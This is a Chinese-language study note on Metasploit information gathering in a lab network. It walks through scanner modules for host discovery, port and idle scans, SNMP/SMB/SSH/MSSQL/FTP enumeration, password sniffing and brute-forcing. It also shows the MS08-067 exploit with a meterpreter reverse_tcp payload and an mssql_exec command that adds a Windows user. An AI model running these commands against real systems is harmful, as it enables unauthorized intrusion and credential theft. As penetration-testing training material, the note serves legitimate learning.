前言
本节学习信息收集
1、简介
信息收集的模块都在 auxiliary/scanner/ 之下
service postgresql start
msfconsole
msf > use auxiliary/scanner/ [TAB] #查看所有scanner
地址的使用方式
192.168.1.20-192.168.1.30、192.168.1.0/24,192.168.11.0/24
也可以编写地址列表:file:/root/h.txt
2、db_nmap
跟 nmap 用法一样,结果存放在 msf 的数据库中
msf > db_nmap -sV 192.168.1.0/24
3、主机发现扫描
msf > search arp
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(scanner/discovery/arp_sweep) > show options
msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24
msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0
msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20 #线程数
msf auxiliary(scanner/discovery/arp_sweep) > run
#跟上面nmap扫描结果一样
4、端口扫描
msf > search portscan
msf > use auxiliary/scanner/portscan/syn #选择syn扫描
msf auxiliary(scanner/portscan/syn) > show options
msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0
msf auxiliary(scanner/portscan/syn) > set PORTS 80
msf auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.1.0/24
msf auxiliary(scanner/portscan/syn) > set THREADS 50
msf auxiliary(scanner/portscan/syn) > run
5、僵尸扫描
查找 ipidseq 主机(查找僵尸机)
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(scanner/ip/ipidseq) > show options
msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/ip/ipidseq) > set THREADS 20
msf auxiliary(scanner/ip/ipidseq) > run
也可以用nmap
msf > db_nmap -PN -sI 192.168.1.110
6、UDP 扫描
msf > use auxiliary/scanner/discovery/udp_sweep
msf auxiliary(scanner/discovery/udp_sweep) > show options
msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/discovery/udp_sweep) > run
这两个有点不同
msf > use auxiliary/scanner/discovery/udp_probe
msf auxiliary(scanner/discovery/udp_probe) > show options
msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 192.168.1.1-150
msf auxiliary(scanner/discovery/udp_probe) > set CHOST 192.168.1.111
msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20
msf auxiliary(scanner/discovery/udp_probe) > run
7、密码嗅探
被动信息收集
支持从 pacap 抓包文件中提取密码
功能类似于 dsniff
msf > search sniffer
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(sniffer/psnuffle) > show options
msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0
msf auxiliary(sniffer/psnuffle) > run
#也可以从pcap读取
msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng
msf auxiliary(sniffer/psnuffle) > jobs
msf auxiliary(sniffer/psnuffle) > kill 0 #把之前的kill
msf auxiliary(sniffer/psnuffle) > run
8、SNMP扫描
对linux
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) > show options
msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.1.111
msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20
msf auxiliary(scanner/snmp/snmp_login) > run
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) > show options
msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.111
msf auxiliary(scanner/snmp/snmp_enum) > run
对windows
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(scanner/snmp/snmp_enumusers) > show options
msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 192.168.1.112
msf auxiliary(scanner/snmp/snmp_enumusers) > run
msf > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(scanner/snmp/snmp_enumshares) > show options
msf auxiliary(scanner/snmp/snmp_enumshares) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 192.168.1.112
msf auxiliary(scanner/snmp/snmp_enumshares) > run
9、SMB扫描
#版本扫描
msf > search smb
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > show options
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.122, 192.168.1.126
msf auxiliary(scanner/smb/smb_version) > run
msf auxiliary(scanner/smb/smb_version) > set SMBUSER Administrator
msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_version) > run
#扫描命令管道。判断 SMB 服务类型(账号、密码)
msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(scanner/smb/pipe_auditor) > show options
msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/pipe_auditor) > run
msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator
msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456
msf auxiliary(scanner/smb/pipe_auditor) > run
#SMB 共享账号(账号、密码)
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(scanner/smb/smb_enumshares) > show options
msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_enumshares) > run
msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_enumshares) > run
#SMB 用户枚举(账号、密码)
msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(scanner/smb/smb_enumusers) > show options
msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_enumusers) > run
#SID 枚举(账号、密码)
msf > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > show options
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/smb/smb_enumusers) > run
10、SSH扫描
#SSH 版本扫描
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_version) > run
#SSH 密码爆破
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt #这是个现成的密码字典
msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false
msf auxiliary(scanner/ssh/ssh_login) > run
#SSH 公钥登陆
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file
11、获取 windows 缺少的补丁
基于已经取得的 session 进行检测
若遇到报错:known bug in WMI query, try migrating to another process
迁移到另一个进程再次进行尝试
msf > use post/windows/gather/enum_patches
msf post(windows/gather/enum_patches) > set SESSION 4
msf post(windows/gather/enum_patches) >show advanced
msf post(windows/gather/enum_patches) > set VERBOSE yes
msf post(windows/gather/enum_patches) > run
#ms08-067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.1.126
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > run
12、mssql 扫描
mssql 扫描端口
默认端口:TCP 1422(动态端口)/ UDP 1434 (查询 TCP 端口号)
#尝试ping,确定端口
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/mssql/mssql_ping) > run
#爆破 mssql 密码
msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(scanner/mssql/mssql_login) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/mssql/mssql_login) > set username Administrator
msf auxiliary(scanner/mssql/mssql_login) > set password ... #选择一个密码字典
msf auxiliary(scanner/mssql/mssql_login) > run
#远程执行代码(获取数据库权限之后)
msf > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(scanner/mssql/mssql_exec) > set RHOSTS 192.168.1.114 #自己的kali
msf auxiliary(scanner/mssql/mssql_exec) > set username Administrator
msf auxiliary(scanner/mssql/mssql_exec) > set password ... #这里是破解出来的密码
msf auxiliary(scanner/mssql/mssql_exec) > set CMD net user user1 pass123 /ADD #执行代码,在数据库里面加一个账号
13、FTP 扫描
#查询版本信息
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ftp/ftp_version) > run
#是否允许匿名登录
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.1.126
msf auxiliary(scanner/ftp/anonymous) > run
#暴力破解
msf > use auxiliary/scanner/ftp/ftp_login
结语
可以发现
用msf进行信息收集的手段非常丰富
当然其中许多效果和原理都与之前学的类似